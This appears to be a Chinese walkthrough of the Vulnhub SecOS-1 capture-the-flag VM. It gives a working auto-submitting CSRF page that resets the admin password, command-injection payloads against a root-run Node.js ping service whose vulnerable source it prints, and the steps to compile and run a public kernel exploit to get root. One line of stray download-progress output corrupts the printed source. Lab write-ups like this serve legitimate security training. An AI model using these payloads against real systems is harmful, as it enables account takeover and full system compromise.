SecOS渗透过程
走过路过,不要错过这个公众号哦!
1
Vulnhub SecOS
环境下载地址:https://www.vulnhub.com/entry/secos-1,88/
2
环境配置
这里没有给OVF文件,给的vmdk文件,环境配置可以新建一个虚拟机
3
解析
这里我先使用zenmap扫了一下C段,发现了靶机的存在
访问一下8081端口
按流程注册一个账号登录,尝试存在漏洞的地方
当看到这个页面的时候
我以为会存在越权漏洞修改spiderman的密码,然而并没有,接下来我在前端代码的注释里发现了
<!--<li><a href="/hint">Wanna help?</a></li>!-->
原来有个hint页面,访问在后发现了
First: the admin visits the website (really) frequently
Second: He runs it locally, on 127.0.0.1.
Third: CSRF and /(http:\/\/[-\/\.\w:0-9\?&]+)/gi, I think that's enough
那么这里就可以结合上面的change password来进行csrf攻击,这里构造poc.html可以使用神器burp suite来构造
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<form action="http://192.168.56.101:8081/change-password" method="POST">
<input type="hidden" name="password" value="test" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
给的代码为,但是这个需要点击,修改一下
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<form name="change" action="http://127.0.0.1:8081/change-password" method="POST">
<input type="hidden" name="password" value="p0desta" />
</form>
<script type="text/javascript">
document.change.submit();
</script>
</body>
</html>
在本地起一个php服务,让其可以访问到该页面,然后
发送过去之后等待一会密码会被修改为p0desta,登录之
4
提权
1
提权一
用这个密码连接ssh,这里我用的工具是MobaXterm,在home下发现
spiderman@SecOS-1:/$ cd home
spiderman@SecOS-1:/home$ ls
secosadmin spiderman
spiderman@SecOS-1:/home$ cd spiderman
spiderman@SecOS-1:~$ ls
tmp vnwa
spiderman@SecOS-1:~$ cd vnwa
spiderman@SecOS-1:~/vnwa$ ls
internalServer.js lib LICENSE node_modules package.json public scripts server.js views
spiderman@SecOS-1:~/vnwa$ cat internalServer.js
var fs = require('fs');
var express = require('express');
var http = require('http');
var sys = require('sys')
var exec = require('child_process').exec;
var crypto = require('crypto');
var utils = require('./lib/utils.js');
var model = require('./lib/model.js');
var app = express();
var server = http.createServer(app);
var logger = function (req, res, next) {
console.log(req.connection.remoteAddress + " tried to access : " + req.url);
next(); // Passing the request to the next handler in the stack.
}
// Configuration
app.configure(function () {
// Session management
app.use(express.cookieParser());
app.use(express.session({secret: 'privateKeyForSession'}));
app.use("/js", express.static(__dirname + '/public/js')); // javascript folder
app.use("/css", express.static(__dirname + '/public/css')); // javascript folder
app.set('views', __dirname + '/views'); // views folder
app.set('view engine', 'ejs'); // view engine for this projet : ejs
  46 32177 46 14941 0 0 1565 0 0:00:20 0:00:09 0:00:11 2935;
app.use(express.bodyParser()); // for POST Requests
app.use(logger); // Here you add your logger to the stack.
app.use(app.router); // The Express routes handler.
});
app.get('/', function (req, res) {
res.render('ping.ejs', {
isConnected: req.session.isConnected,
isAdmin: req.session.isAdmin
});
});
// Update password
app.post('/', function (req, res) {
ip = req.body.ip
if (ip == "") {
utils.redirect(req, res, '/ping-status');
} else {
// getting the command with req.params.command
var child;
// console.log(req.params.command);
child = exec('ping ' + ip, function (error, stdout, stderr) {
res.render('ping.ejs', {
isConnected: req.session.isConnected,
message: stdout,
isAdmin: req.session.isAdmin
});
});
}
});
server.listen(9000, '127.0.0.1', function() {
console.log("Listening on port 9000");
});
发现9000端口有起的一个服务,
spiderman@SecOS-1:~/vnwa$ ps -aux | grep inter
root 1025 0.0 0.1 4692 1068 ? Ss 08:58 0:00 sudo -u root sh -c /usr/local/bin/node /home/spiderman/vnwa/internalServer.js
root 1028 0.0 0.0 2268 488 ? S 08:58 0:00 sh -c /usr/local/bin/node /home/spiderman/vnwa/internalServer.js
root 1029 0.0 1.5 78144 16144 ? Sl 08:58
可以发现是以root权限运行的,这里为了测试方便将端口转发出去
ssh -L localhost:2000:localhost:9000 spiderman@192.168.56.101
可以参考这篇文章https://blog.fundebug.com/2017/04/24/ssh-port-forwarding/
那么访问本地的2000端口就可以访问到靶机9000端口的服务
简单看一下代码可以知道这里存在命令注入漏洞
127.0.0.1 -c 1 && ls
这里加-c 1是因为linux下的ping命令是不会停止的
这里也可以看出是root权限运行的,这里可以直接拿flag。
127.0.0.1 -c 1 && cat /root/flag.txt
2
提权二
spiderman@SecOS-1:~/vnwa$ uname -a
Linux SecOS-1 3.13.0-24-generic #46-Ubuntu SMP Thu Apr 10 19:08:14 UTC 2014 i686 i686 i686 GNU/Linux
spiderman@SecOS-1:~/vnwa$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 14.04 LTS
Release: 14.04
Codename: trusty
google可以搜索到提权的exp:https://www.exploit-db.com/exploits/37292/,
spiderman@SecOS-1:~/vnwa$ ls
exploit.c lib node_modules public server.js
internalServer.js LICENSE package.json scripts views
spiderman@SecOS-1:~/vnwa$ gcc exploit.c -o exploit
spiderman@SecOS-1:~/vnwa$ ls
exploit internalServer.js LICENSE package.json scripts views
exploit.c lib node_modules public server.js
spiderman@SecOS-1:~/vnwa$ ./exploit
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# whoami
root
# ls
LICENSE exploit.c lib package.json scripts views
exploit internalServer.js node_modules public server.js
# cd /root
# ls
flag.txt
# cat flag.txt
Hey,
Congrats, you did it !
The flag for this first (VM) is: MickeyMustNotDie.
Keep this flag because it will be needed for the next VM.
If you liked the Web application, the code is available on Github.
(https://github.com/PaulSec/VNWA)
There should be more VMs to come in the next few weeks/months.
Twitter: @PaulWebSec
GitHub : PaulSec
5
声明
文章旨在普及网络安全知识,提高小伙伴的安全知识,若读者因此做出危害网络安全的行为后果自负,与合天智汇及本人无关,特此声明。
投
稿
福
利
2018年第一季度原创投稿评优结果将在4月份公布啦!
届时将评选出三个奖项,共计15名原创作者!
积极参与奖
最具文采奖
最佳作者奖
丰厚大礼等着大家哟,快来积极参与投稿吧!
重金悬赏 | 合天原创投稿等你来!(点击了解投稿详情)
合天智汇
网址 : www.heetian.com
电话:4006-123-731
长按图片,给我们投稿哟→